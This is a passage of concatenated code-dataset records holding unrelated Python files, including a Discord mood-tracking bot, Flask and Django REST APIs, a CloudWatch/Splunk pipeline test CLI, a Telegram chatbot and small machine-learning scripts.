sleepTime)\r\n","repo_name":"KalanaDananjaya/distributed-content-search","sub_path":"Python create nodes/create_nodes.py","file_name":"create_nodes.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35848910465","text":"# -*- coding: utf-8 -*-\n\n__title__ = 'pydsm'\n__version__ = '0.1'\n__author__ = 'Jimmy Callin'\n\nimport pickle\nimport bz2\nfrom pydsm.model import CooccurrenceDSM\nfrom pydsm.model import RandomIndexing\nfrom pydsm.indexmatrix import IndexMatrix\n\n\ndef load(filepath):\n return pickle.load(bz2.open(filepath, 'rb'))\n\n\ndef build(model,\n corpus,\n config=None,\n **kwargs):\n \"\"\"\n Builds a distributional semantic model.\n Parameters:\n model: A semantic model class.\n Available models:\n CooccurrenceDSM\n RandomIndexing\n corpus: Either a path to file or an iterable.\n\n Returns: A DSM.\n \"\"\"\n if config is None:\n config = {}\n config = dict(config, **kwargs)\n return model(corpus=corpus, **config)","repo_name":"jimmycallin/pydsm","sub_path":"pydsm/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"53"} +{"seq_id":"24850197176","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# DecisionTreeOnStudent1.py BY Eric USING PyCharm\n# AT 2019/12/23 16:45\n# TOPIC :\n\nfrom sklearn.ensemble import RandomForestClassifier\nimport pandas as pd\nif __name__ == '__main__':\n clf = RandomForestClassifier(random_state=0)\n df = pd.read_csv(r'student_en.csv')\n mylist = df.values.tolist()\n X = []\n y = []\n for i in mylist:\n y.append(i.pop())\n X.append(i)\n clf.fit(X, y)\n print(clf.predict([[1,0,0,3,0,0,0,2]]))","repo_name":"PearlyWave/LearnDecisionTree","sub_path":"DecisionTreeOnStudent1.py","file_name":"DecisionTreeOnStudent1.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26587334551","text":"from venv import create\nimport discord\nimport os\nfrom dotenv import load_dotenv\nfrom bot_database import create_db, log_message, get_all_messages_past_x_hours, log_reminder, get_reminder\nfrom datetime import datetime\nimport math\nimport openai\nimport numpy as np\nimport random\nfrom cohere_engine import generate, classify\nfrom numpy_preprocess import adapt_array\nfrom mood_time_series import predict_mood\n\nload_dotenv()\nMOOD = ['sad', 'angry', 'curious', 'disgusted', 'fearful', 'happy', 'neutral', 'surprised']\nHOURS = 2\n\n\nmode = \"mood\"\n\ndef get_gpt3_message(message):\n openai.api_key = os.getenv(\"OPENAI_API_KEY\")\n data = openai.Completion.create(\n model=\"text-davinci-002\",\n prompt=message,\n max_tokens=100,\n temperature=1.0,\n presence_penalty=2.0,\n frequency_penalty=2.0\n )\n return data.to_dict()[\"choices\"][0][\"text\"].strip(\"\\n\")\n\ndef get_convo_reply(message):\n openai.api_key = os.getenv(\"OPENAI_API_KEY\")\n data = openai.Completion.create(\n model=\"text-davinci-002\",\n temperature=0.9,\n max_tokens=150,\n prompt=f\"Human: {message} \\nAI:\",\n top_p=1,\n frequency_penalty=0.0,\n presence_penalty=0.6,\n stop=[\" Human:\", \" AI:\"]\n )\n # print(data)\n return data.to_dict()[\"choices\"][0][\"text\"].strip(\"\\n\")\n \ndef suggest_activity(author_id):\n messages = get_all_messages_past_x_hours(author_id, HOURS)\n data = [apply_sigmoid(msg) for msg in messages]\n # print(data)\n moods, _ = 
predict_mood(data)\n idx = (-moods).argsort()[:3] #indices of largest to smallest\n moods_top_3 = [MOOD[i] for i in idx]\n for i in idx:\n if moods[i] < 1/5:\n moods_top_3.remove(MOOD[i])\n ret_messages = []\n for mood in moods_top_3:\n if mood not in [\"curious\", \"neutral\", \"surprised\"]:\n ret_messages.append(get_gpt3_message(f\"Write a suggestion to promote mental health for a worker who is feeling {mood} while at work\"))\n return ret_messages\n\ndef apply_sigmoid(message):\n return (2.5 / (1 + np.exp(-(message[1]-2/3*HOURS*3600)/(HOURS*3600/16))))*message[2]\n\nclass MyClient(discord.Client):\n def __init__(self, intents=discord.Intents.default()):\n intents.message_content = True\n super().__init__(intents=intents)\n\n async def on_ready(self):\n print(f'Logged on as {self.user}!')\n\n async def on_message(self, message):\n # print(dir(message), message.author, message.content)\n if message.author != self.user:\n author_id = message.author.id\n global mode\n if mode == \"mood\":\n if message.content.startswith('!mood'):\n messages = get_all_messages_past_x_hours(str(author_id), HOURS) # returns a list of messages, more recent = bigger value for message[1]\n if len(messages) == 0:\n await message.channel.send(f\"You haven't sent any messages in the last {HOURS} hours. Please send some messages to get started.\")\n return\n data = [apply_sigmoid(msg) for msg in messages]\n # print(data)\n mood, prediction = predict_mood(data)\n # await message.channel.send(f\"**{message.author}**, your mood right now: {mood}\")\n # await message.channel.send(result[0])\n\n embedOptions = {\n \"title\": \"Mood checker\",\n \"type\": \"rich\",\n \"color\": 2899536,\n \"description\": f\"**{message.author}'s** mood right now: {prediction}\",\n \"timestamp\": str(datetime.utcnow())\n }\n \n embed = discord.Embed.from_dict(embedOptions)\n embed.add_field(name='\\U0001F622', value=f'{round(mood[0] * 100)}%', inline=True)\n embed.add_field(name='\\U0001F621', value=f'{round(mood[1] * 100)}%', inline=True)\n embed.add_field(name='\\U0001F9D0', value=f'{round(mood[2] * 100)}%', inline=True)\n embed.add_field(name='\\U0001F92E', value=f'{round(mood[3] * 100)}%', inline=True)\n embed.add_field(name='\\U0001F628', value=f'{round(mood[4] * 100)}%', inline=True)\n embed.add_field(name='\\U0001F600', value=f'{round(mood[5] * 100)}%', inline=True)\n embed.add_field(name='\\U0001F610', value=f'{round(mood[6] * 100)}%', inline=True)\n embed.add_field(name='\\U0001F62F', value=f'{round(mood[7] * 100)}%', inline=True)\n embed.add_field(name='** **', value='** **', inline=True)\n await message.channel.send(embed=embed, content=None)\n elif message.content.startswith(\"!suggest\"):\n bot_msg = await message.channel.send(\"IntelliCord is thinking...\")\n messages = suggest_activity(author_id)\n embed_options = {\"title\": f\"IntelliCord Suggestions\", \"type\": \"rich\", \"color\": 2899536, \"timestamp\": str(datetime.utcnow())}\n embed = discord.Embed.from_dict(embed_options)\n for i, msg in enumerate(messages):\n embed.add_field(name=f\"Suggestion {i+1}\", value=msg)\n await bot_msg.edit(embed=embed, content=None)\n elif message.content.startswith(\"!convo\"):\n mode = \"convo\"\n await message.channel.send(\"Changing into convo mode. 
What are you thinking right now?\")\n else:\n create_db(str(author_id)) # can log existing users a do a check if that user exists\n time_count = datetime.now() - datetime(2022, 8, 19, 0, 0, 0)\n second_count = math.floor(time_count.total_seconds())\n # print(second_count)\n classification = classify(message.content)\n # print(classification)\n log_message(str(author_id), message.content, second_count, adapt_array(classification))\n messages = get_all_messages_past_x_hours(str(author_id), HOURS) \n data = [apply_sigmoid(msg) for msg in messages]\n mood, prediction = predict_mood(data)\n\n author = message.author.display_name\n msg = None\n mood_ = \"\"\n if (mood[0] >= 0.5):\n mood_ = MOOD[0]\n msg = f\"It seems you are very sad right now, {author}. Hey @everyone, your teammate {author} seems to be really {MOOD[0]}. As {author}'s teammate, you can help :)\"\n elif (mood[1] >= 0.7):\n mood_ = MOOD[1]\n msg = f\"Take a breath and calm down, {author}. Hey @everyone, your teammate {author} is {MOOD[1]} right now. As {author}'s teammate, you can calm him/her down :)\"\n elif (mood[4] >= 0.7):\n mood_ = MOOD[4]\n msg = f\"Why are you scared, {author}?. If you are in danger, please seek help from your teammate.\"\n \n if (msg != None):\n reminder = get_reminder(str(author_id), mood_)\n if (len(reminder) == 0):\n await message.channel.send(msg)\n time_count = datetime.now() - datetime(2022, 8, 19, 0, 0, 0)\n second_count = math.floor(time_count.total_seconds())\n log_reminder(str(author_id), mood_, second_count)\n else:\n tell_joke = random.random() > 0.8\n if (mood_ == \"sad\" and tell_joke):\n joke = get_gpt3_message(\"Tell me a random joke\")\n msg = \"Let me make you feel better: \"\n await message.channel.send(joke)\n elif mode == \"convo\":\n if message.content.startswith(\"!exit\"):\n mode = \"mood\"\n await message.channel.send(\"Returning to mood checker\")\n else:\n reply = get_convo_reply(message.content)\n await message.channel.send(reply)\n \n\n\n\ndef main():\n client = MyClient()\n client.run(os.getenv('TOKEN'))\n # openai.organization = \"org-egOUH3FiN9wJSzhHqGGRoZXO\"\n openai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\nif __name__ == '__main__':\n main()","repo_name":"Nicholas-Sidharta12365/HT6ix-2022","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":8642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18653776689","text":"import numpy as np\n\nweights = np.array([[1, 2, 3, 4], [2, 3, 4, 5], [3, 4, 5, 6]])\nbatch_x = np.array([[1, 2, 3, 4], [2, 2, 2, 2]])\nbatch_y = np.array([[1, 2, 1], [2, 3, 2]])\nbias = np.array([1, 1, 1])\na = np.vstack([np.dot(weights, x)+bias for x in batch_x])\n# print(a)\na_minus_y = a - batch_y\nprint(batch_x)\nprint(a_minus_y)\n\nret = np.array([np.tensordot(minus, x, axes=0) for minus, x in zip(a_minus_y, batch_x)])\nprint(ret)\nprint(ret.mean(axis=0))\n\n\n\n","repo_name":"BridgeMia/NLPHOMEWORK","sub_path":"text_classification/numpy_test_pad.py","file_name":"numpy_test_pad.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33944285554","text":"from flask import Blueprint, jsonify # jsonify creates an endpoint response object\nfrom flask_restful import Api, Resource # used for REST API building\nimport requests # used for testing \nimport random\n\nfrom model_SATquiz import *\n\nSATquiz_api = Blueprint('SATquiz_api', __name__,\n url_prefix='/api/SATquiz')\n\napi 
= Api(SATquiz_api)\n\nclass QuestionsAPI:\n # not implemented\n class _Create(Resource):\n def post(self, question):\n pass\n \n # getJokes()\n class _Read(Resource):\n def get(self):\n return jsonify(getSAT())\n\n # getJoke(id)\n class _ReadID(Resource):\n def get(self, id):\n return jsonify(getSAT(id))\n\n # getRandomJoke()\n class _ReadRandom(Resource):\n def get(self):\n return jsonify(getRandomQuestion())\n \n # getRandomJoke()\n class _ReadCount(Resource):\n def get(self):\n count = countQuestion()\n countMsg = {'count': count}\n return jsonify(countMsg)\n\n api.add_resource(_Create, '/create/')\n api.add_resource(_Read, '/')\n api.add_resource(_ReadID, '/')\n api.add_resource(_ReadRandom, '/random')\n api.add_resource(_ReadCount, '/count')\n\nif __name__ == \"__main__\": \n # server = \"http://127.0.0.1:5000\" # run local\n server = 'http://127.0.0.1:5000/' # run from web\n url = server + \"/api/SATquiz\"\n responses = [] # responses list\n\n count_response = requests.get(url+\"/count\")\n count_json = count_response.json()\n count = count_json['count']\n\n num = str(random.randint(0, count-1)) # test a random record\n responses.append(\n requests.get(url+\"/\"+num) # read joke by id\n ) \n \n responses.append(\n requests.get(url+\"/random\") # read a random joke\n ) \n\n # cycle through responses\n for response in responses:\n print(response)\n try:\n print(response.json())\n except:\n print(\"unknown error\")","repo_name":"Firestorm0986/PBLproject","sub_path":"api/SATquiz.py","file_name":"SATquiz.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42069780251","text":"#!/usr/bin/env python3\n\"\"\"\nCommand line interface for the log testing scripts.\n\nWhen new formats are added to put_cloudwatch_logs, add them to the long_options list,\nand add a short single letter version to the format argument's `choices` list.\n\nNote that the way it works right now, two different formats MUST NOT start with\nthe same first letter. 
If that happens, the main() function must be modified.\n\"\"\"\n\nimport os\nimport sys\nfrom datetime import datetime\nfrom pprint import pprint\nfrom time import sleep\n\nimport click\n\nfrom cybersecuritytools.splunk.credentials import credentials\nfrom cybersecuritytools.splunk.search import Search\n\nfrom .put_cloudwatch_logs import send_logs_to_cloudwatch, setup_cloudwatch_log_groups\nfrom .query_splunk import load_test_found, payload_found, search_query\n\n\n@click.group()\ndef generate_cloudwatch_logs() -> None:\n pass\n\n\n@generate_cloudwatch_logs.command()\n@click.option(\"-d\", \"--destination-arn\", required=True, type=str)\n@click.option(\"-r\", \"--role-arn\", required=True, type=str)\ndef create_log_groups(destination_arn: str, role_arn: str) -> None:\n setup_cloudwatch_log_groups(dest_arn=destination_arn, role_arn=role_arn)\n\n\n@generate_cloudwatch_logs.command()\ndef send_logs() -> None:\n \"\"\"Send test data to Cloudwatch log-groups based on selected format.\"\"\"\n send_logs_to_cloudwatch()\n\n\n@generate_cloudwatch_logs.command()\n@click.option(\"-t\", \"--timeout\", type=int, default=600)\n@click.option(\"--ssm\", required=True, help=\"SSM root path\")\ndef smoke_test(ssm_root: str, timeout: int) -> None:\n \"\"\"Run an end to end test on the pipeline\"\"\"\n cloudwatch_results = send_logs_to_cloudwatch()\n print(\"Sent logs to CloudWatch\")\n start_timestamp = int(datetime.now().timestamp())\n print(\"Polling splunk to find our logs...\")\n\n splunk_credentials = credentials(ssm_root, \"search\")\n splunk = Search(splunk_credentials)\n\n while True:\n duration = int(datetime.now().timestamp()) - start_timestamp\n splunk_results = splunk.search(search_query(test_type=\"smoke_test\"))\n\n if payload_found(cloudwatch_results, splunk_results):\n print(f\"\\n✔️ Pipeline smoketest succeeded in {duration} seconds\")\n sys.exit(0)\n\n if duration > timeout:\n print(\n f\"\\n❌TIMEOUT searching for payload in splunk after {duration} seconds\",\n file=sys.stderr,\n )\n print(\"CloudWatch results: \")\n pprint(cloudwatch_results)\n print(\"\\n\\n\\n\\n\")\n print(\"Splunk results: \")\n pprint(splunk_results)\n print(\n f\"\\n❌ TIMEOUT searching for payload in splunk after {duration} seconds\",\n file=sys.stderr,\n )\n sys.exit(1)\n\n sleep(1)\n print(\".\", end=\"\", flush=True)\n\n\n@generate_cloudwatch_logs.command()\n@click.option(\"-t\", \"--timeout\", type=int, default=600)\n@click.option(\"--ssm\", required=True, help=\"SSM root path\")\ndef load_test(ssm: str, timeout: int) -> None:\n \"\"\"Check Splunk for artillery payloads on the pipeline\"\"\"\n start_timestamp = float(datetime.now().timestamp())\n\n splunk_credentials = credentials(ssm, \"search\")\n splunk = Search(splunk_credentials)\n\n while True:\n\n duration = float(datetime.now().timestamp()) - start_timestamp\n artillery_config = 80000\n requests_completed = int(os.environ.get(\"requests_completed\", artillery_config))\n\n splunk_results = splunk.search(search_query(test_type=\"smoke_test\"))\n\n if load_test_found(splunk_results, artillery_config, requests_completed):\n print(f\"\\n✔️ Pipeline load test succeeded in {duration} seconds\")\n sys.exit(0)\n\n if requests_completed < int(artillery_config * 0.9):\n print(\n f\"\\n❌INSUFFICIENT DATA Artillery has only sent {requests_completed}\"\n f\"requests from a config of {artillery_config}\"\n )\n sys.exit(0)\n\n if duration > timeout:\n print(\n f\"\\n❌TIMEOUT searching for payload in splunk after {duration} seconds\",\n file=sys.stderr,\n )\n 
print(\"Splunk results: \")\n pprint(splunk_results)\n print(\n f\"\\n❌TIMEOUT searching for payload in splunk after {duration} seconds\",\n file=sys.stderr,\n )\n sys.exit(1)\n\n sleep(1)\n print(\".\", end=\"\", flush=True)\n","repo_name":"alphagov/cybersecuritytools","sub_path":"cybersecuritytools/csls/generate_cloudwatch_logs/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":4483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31741581638","text":"\r\nfrom rest_framework import serializers\r\nfrom watchlist_app.models import WatchList, StreamPlatform, Review\r\n\r\n\r\n\r\n\r\nclass ReviewSerializer(serializers.ModelSerializer):\r\n review_user = serializers.StringRelatedField(read_only=True)\r\n class Meta:\r\n model = Review\r\n # fields = \"__all__\"\r\n exclude = ('watchlist',)\r\n \r\nclass WatchListSerializer(serializers.ModelSerializer):\r\n reviews = ReviewSerializer(many=True, read_only = True)\r\n #read only allows to only see reviews during a get request and not add reviews from watchlist in a post request\r\n # len_name = serializers.SerializerMethodField()\r\n class Meta:\r\n model = WatchList\r\n fields = \"__all__\"\r\n # fields = ['id','name','description']\r\n # exclude = ['active']\r\n\r\nclass StreamPlatformSerializer(serializers.HyperlinkedModelSerializer):\r\n watchlist = WatchListSerializer(many=True, read_only = True)\r\n # watchlist = serializers.StringRelatedField(many=True)\r\n class Meta:\r\n model = StreamPlatform\r\n fields = \"__all__\"\r\n # def get_len_name(self, object):\r\n # return len(object.name)\r\n \r\n # def validate_name(self,value):\r\n # if len(value) < 2:\r\n # raise serializers.ValidationError('Length of name is too short')\r\n # return value\r\n \r\n # def validate(self,data):\r\n # if data['name'] == data['description']:\r\n # raise serializers.ValidationError('Name must not be the same as description')\r\n # return data\r\n \r\n\r\n# def name_length(value):\r\n# if len(value) < 2:\r\n# raise serializers.ValidationError('The length is too short')\r\n# return value\r\n\r\n# class MovieSerializer(serializers.Serializer):\r\n# id = serializers.IntegerField(read_only=True)\r\n# name = serializers.CharField(validators=[name_length])\r\n# description = serializers.CharField()\r\n# active = serializers.BooleanField()\r\n \r\n# def create(self, validated_data):\r\n# return Movie.objects.create(**validated_data)\r\n \r\n# def update(self, instance, validated_data):\r\n# instance.name = validated_data.get('name', instance.name)\r\n# instance.description = validated_data.get('description', instance.description)\r\n# instance.active = validated_data.get('active', instance.active)\r\n# instance.save()\r\n# return instance\r\n \r\n #validation is a way of making sure deserialized data is stored in the database properly\r\n #1. Field-level validation.. def validate_fieldname(self,value)\r\n # def validate_name(self,value):\r\n # if len(value) < 2:\r\n # raise serializers.ValidationError('Length of name is too short')\r\n # return value\r\n \r\n #2 OBJECT-LEVEL VALIDATION.. 
def validate(self,data)\r\n # def validate(self,data):\r\n # if data['name'] == data['description']:\r\n # raise serializers.ValidationError('Name must not be the same as description')\r\n # return data\r\n \r\n #3 Validator, as a function..check top of code","repo_name":"Darkdev007/django-rest-framework","sub_path":"watchlist_app/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72172845929","text":"import telepot\r\nimport aiml\r\nimport time\r\n\r\n\r\ndef on_chat_message(msg):\r\n content_type, chat_type, chat_id = telepot.glance(msg)\r\n if content_type == 'text':\r\n\r\n name = msg[\"from\"][\"first_name\"]\r\n txt = msg['text']\r\n photo_url = \"https://commons.wikimedia.org/wiki/File:Colonia_iulia_felix.jpg#/media/File:Colonia_iulia_felix.jpg\"\r\n\r\n if '/start' in txt:\r\n bot.sendMessage(chat_id, 'ciao')\r\n elif 'alla prossima' in txt:\r\n bot.sendMessage(chat_id, 'Grazie e alla prossima ' + name)\r\n elif 'quando è stato fondato?' in txt:\r\n bot.sendPhoto(chat_id, photo_url,\r\n \"dall'epigrafe rinvenuta si evince che la costruzione dell'anfiteatro risale al I II d.C.\")\r\n else:\r\n print(msg[\"text\"])\r\n r = generate_aiml(msg['text'], chat_id)\r\n if r is not None and r != \"\":\r\n html_message = r.replace(\"\\\\n\", \"\\n\")\r\n bot.sendMessage(chat_id, html_message)\r\n\r\n\r\ndef generate_aiml(text, chat_id):\r\n \r\n reply = kernel.respond(text)\r\n return reply\r\n\r\n\r\nkernel = aiml.Kernel()\r\nkernel.learn(\"startup.xml\")\r\nkernel.respond(\"load aiml b\")\r\nbot = telepot.Bot(\"TOKEN\")\r\n\r\nbot.message_loop(on_chat_message)\r\n\r\n\r\nwhile 1:\r\n time.sleep(30)\r\n","repo_name":"25sal/cleopatra","sub_path":"gamification/chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39054392413","text":"import timeit, sys\nimport numpy as np\nimport healpy as hp\nimport h5py\nfrom functools import partial\nimport schwimmbad\nimport matplotlib.pyplot as plt\nfrom numba import jit\nfrom astropy.cosmology import Planck13 as cosmo\nfrom astropy import units as u\n\nfrom helpers import get_Z_LOS, get_rotation_matrix, get_spherical_from_cartesian, get_cartesian_from_spherical\nsys.path.append('/cosma7/data/dp004/dc-payy1/my_files/flares_pipeline')\nimport flares\n\nconv = (u.solMass/u.Mpc**2).to(u.solMass/u.pc**2)\n\n\n\ndef get_data(ii, tag, inp = 'FLARES'):\n\n num = str(ii)\n if inp == 'FLARES':\n if len(num) == 1:\n num = '0'+num\n\n sim = rF\"../flares_pipeline/data/flares.hdf5\"\n num = num+'/'\n\n else:\n sim = rF\"../flares_pipeline/data/EAGLE_{inp}_sp_info.hdf5\"\n num=''\n\n with h5py.File(sim, 'r') as hf:\n cop = np.array(hf[num+tag+'/Galaxy'].get('COP'), dtype = np.float64)\n mstar = np.array(hf[num+tag+'/Galaxy'].get('Mstar_30'), dtype = np.float64)*1e10\n S_len = np.array(hf[num+tag+'/Galaxy'].get('S_Length'), dtype = np.int64)\n G_len = np.array(hf[num+tag+'/Galaxy'].get('G_Length'), dtype = np.int64)\n S_coords = np.array(hf[num+tag+'/Particle'].get('S_Coordinates'), dtype = np.float64)\n G_coords = np.array(hf[num+tag+'/Particle'].get('G_Coordinates'), dtype = np.float64)\n S_mass = np.array(hf[num+tag+'/Particle'].get('S_MassInitial'), dtype = np.float64)*1e10\n S_Z = np.array(hf[num+tag+'/Particle'].get('S_Z_smooth'), dtype = np.float64)\n S_age = 
np.array(hf[num+tag+'/Particle'].get('S_Age'), dtype = np.float64)*1e3\n G_mass = np.array(hf[num+tag+'/Particle'].get('G_Mass'), dtype = np.float64)*1e10\n G_sml = np.array(hf[num+tag+'/Particle'].get('G_sml'), dtype = np.float64)\n G_Z = np.array(hf[num+tag+'/Particle'].get('G_Z_smooth'), dtype = np.float64)\n\n begin = np.zeros(len(S_len), dtype = np.int64)\n end = np.zeros(len(S_len), dtype = np.int64)\n begin[1:] = np.cumsum(S_len)[:-1]\n end = np.cumsum(S_len)\n\n gbegin = np.zeros(len(G_len), dtype = np.int64)\n gend = np.zeros(len(G_len), dtype = np.int64)\n gbegin[1:] = np.cumsum(G_len)[:-1]\n gend = np.cumsum(G_len)\n\n\n return cop, mstar, S_coords, G_coords, S_mass, S_Z, S_age, G_mass, G_sml, G_Z, begin, end, gbegin, gend\n\n\n\ndef get_ZLOS(angle, scoords, gcoords, this_gmass, this_gZ, this_gsml, lkernel, kbins):\n\n vector = get_cartesian_from_spherical(angle)\n rot = get_rotation_matrix(vector)\n this_scoords = (rot @ scoords.T).T\n this_gcoords = (rot @ gcoords.T).T\n\n Z_los_SD = get_Z_LOS(this_scoords, this_gcoords, this_gmass, this_gZ, this_gsml, lkernel, kbins)*conv\n\n return Z_los_SD\n\n\nif __name__ == \"__main__\":\n\n ii, tag, sim_type = sys.argv[1], sys.argv[2], sys.argv[3]\n\n # tag='010_z005p000'\n # sim_type='FLARES'\n\n #sph kernel approximations\n kinp = np.load('./data/kernel_sph-anarchy.npz', allow_pickle=True)\n lkernel = kinp['kernel']\n header = kinp['header']\n kbins = header.item()['bins']\n\n # Generate different viewing angles\n nside=8\n hp_theta, hp_phi = hp.pix2ang(nside, range(hp.nside2npix(nside)))\n angles = np.vstack([hp_theta, hp_phi]).T\n\n #For galaxies in region `num`\n num = str(ii)\n if len(num) == 1:\n num = '0'+num\n cop, mstar, S_coords, G_coords, S_mass, S_Z, S_age, G_mass, G_sml, G_Z, begin, end, gbegin, gend = get_data(num, tag, inp = 'FLARES')\n z = float(tag[5:].replace('p','.'))\n cop = cop/(1+z)\n S_coords/=(1+z)\n G_coords/=(1+z)\n\n req_ind = np.where(mstar>10**9.5)[0]\n print (\"Number of selected galaxies = \", len(req_ind))\n filename = F'data/Zlos_inclination_{num}.hdf5'\n fl = flares.flares(fname = filename, sim_type = sim_type)\n fl.create_group(F'{tag}')\n\n for kk, jj in enumerate(req_ind):\n\n #Coordinates and attributes for the jj galaxy in ii region\n scoords = S_coords[:, begin[jj]:end[jj]].T - cop[:,jj]\n gcoords = G_coords[:, gbegin[jj]:gend[jj]].T - cop[:,jj]\n\n this_smass = S_mass[begin[jj]:end[jj]]\n this_gmass = G_mass[gbegin[jj]:gend[jj]]\n\n this_sZ = S_Z[begin[jj]:end[jj]]\n this_gZ = G_Z[gbegin[jj]:gend[jj]]\n\n this_age = S_age[begin[jj]:end[jj]]\n this_gsml = G_sml[gbegin[jj]:gend[jj]]\n\n\n start = timeit.default_timer()\n print (F\"Computing Zlos's for task {kk}/{len(req_ind)}\")\n calc_Zlos = partial(get_ZLOS, scoords=scoords, gcoords=gcoords, this_gmass=this_gmass, this_gZ=this_gZ, this_gsml=this_gsml, lkernel=lkernel, kbins=kbins)\n pool = schwimmbad.MultiPool(processes=16)\n Zlos = np.array(list(pool.map(calc_Zlos, angles)))\n pool.close()\n\n fl.create_dataset(Zlos, F'S_los_{jj}', F'{tag}',\n desc = F'Star particle line-of-sight metal column density along the z-axis for galaxy index {jj} for different viewing angles',\n unit = 'Msun/pc^2')\n\n stop = timeit.default_timer()\n print (F\"Took {np.round(stop - start, 6)/60} 
minutes\")\n","repo_name":"stephenmwilkins/flares_inclination","sub_path":"calc_los_for_orientations.py","file_name":"calc_los_for_orientations.py","file_ext":"py","file_size_in_byte":5054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70100079528","text":"import logging\nimport sys\n\nLOG_LEVEL = logging.DEBUG\n\n\ndef init_log():\n\tlog = logging.getLogger(__name__)\n\tlog.setLevel(LOG_LEVEL)\n\tconsole = logging.StreamHandler(sys.stderr)\n\tconsole.setLevel(LOG_LEVEL)\n\tfmt = \"[%(levelname)s][%(asctime)s][%(process)d]\" \\\n\t \"logger=%(name)s|tag=%(funcName)s:%(filename)s:%(lineno)d|\" \\\n\t \"content=%(message)s\"\n\tdatefmt = \"%Y-%m-%d %H:%M:%S %z\"\n\tformatter = logging.Formatter(fmt=fmt, datefmt=datefmt)\n\tconsole.setFormatter(formatter)\n\tlog.addHandler(console)\n\treturn log\n\n\nlog = init_log()\n","repo_name":"yuzhiquan/flask_demo","sub_path":"init_log.py","file_name":"init_log.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19847827378","text":"#Declaración de variables y lista\ncant = int(input(f'Cuantos alumnos registrará?\\n'))\nalumnos = dict()\n\n#Ingresar los datos de cada alumno\nfor j in range(cant):\n nom = input(f'Cual es el nombre del alumno N° {j + 1}?\\n')\n canNot = int(input(f'Cuantas notas ingresará para el alumno {nom}?\\n'))\n notas = []\n #Recorremos una lista para ingresar las notas\n for i in range(canNot):\n condi = 1\n \n #Bucle While, perciste hasta que la nota sea correcta y entre 0 y 20\n while True:\n # valida otro valor distinto de numero\n try:\n valor = float(input(f'ingrese la nota {i + 1}\\n'))\n \n except ValueError:\n print('El dato ingresado no es número \\n')\n continue\n \n #valida que se encuntre entre 0 y 20\n if valor > 20 or valor < 0:\n print('La nota ingresada es menor de cero o mayor a 20, por favor corregir \\n')\n continue\n else:#ingresa valor a la lista\n notas.append(valor)\n break \n\n #find e while y agregar datos al diccionario\n alumnos.update(dict(nomAlu = nom, notAlum = notas, min = min(notas), max = max(notas), prom = sum(notas)/len(notas)))\n\nfor clave, valor in alumnos.items():\n print(f' la clave es {clave} y el valor es {valor}')","repo_name":"faquino012/RetoSem3","sub_path":"pregunta3.py","file_name":"pregunta3.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40446211857","text":"#*****************************************************\n#\n#Program Author: Frances Zhao\n#Completion Date: May 6 2021\n#Program Name: Lesson 7_5\n#Description: Ask the user to enter numbers one at a time\n#for each number, x, display –x, and reversed\n#\n#*****************************************************\n\n#prompting the user for a number\nx = float(input(\"Please enter a number: \"))\n\n#outputting the result \nwhile x != 0:\n\tx *= -1\n\tprint(x)\n\tx = float(input(\"Please enter another number: \"))\nprint(\"0 cannot be negative or positive.\")\n\t\n\t","repo_name":"frances-zhao/ICS207","sub_path":"homework/lesson 7/lesson7_5.py","file_name":"lesson7_5.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23144282563","text":"from flask import Flask, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom os import 
environ\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = environ.get('dbURL') or 'mysql+mysqlconnector://root@localhost:3306/esd-restaurant'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\nCORS(app)\n\n\nclass Restaurant(db.Model):\n __tablename__ = \"restaurant\"\n\n restaurantID = db.Column(db.Integer, unique = True, primary_key = True)\n restaurantName = db.Column(db.String(100), nullable = False)\n restaurantContact = db.Column(db.String(8), nullable = False)\n restaurantAddress = db.Column(db.String(100), nullable = False)\n postalCode = db.Column(db.Integer, nullable = False)\n\n def __init__(self, restaurantID, restaurantName, restaurantContact, restaurantAddress, postalCode):\n self.restaurantID = restaurantID\n self.restaurantName = restaurantName\n self.restaurantContact = restaurantContact\n self.restaurantAddress = restaurantAddress\n self.postalCode = postalCode\n\n def json(self):\n return {\"restaurantID\" : self.restaurantID, \"restaurantName\" : self.restaurantName, \"restaurantContact\" : self.restaurantContact, \"restaurantAddress\": self.restaurantAddress, \"postalCode\" : self.postalCode}\n\nclass Food(db.Model):\n __tablename__ = \"food\"\n\n foodID = db.Column(db.Integer, unique = True, primary_key = True)\n restaurantID = db.Column(db.Integer, nullable = 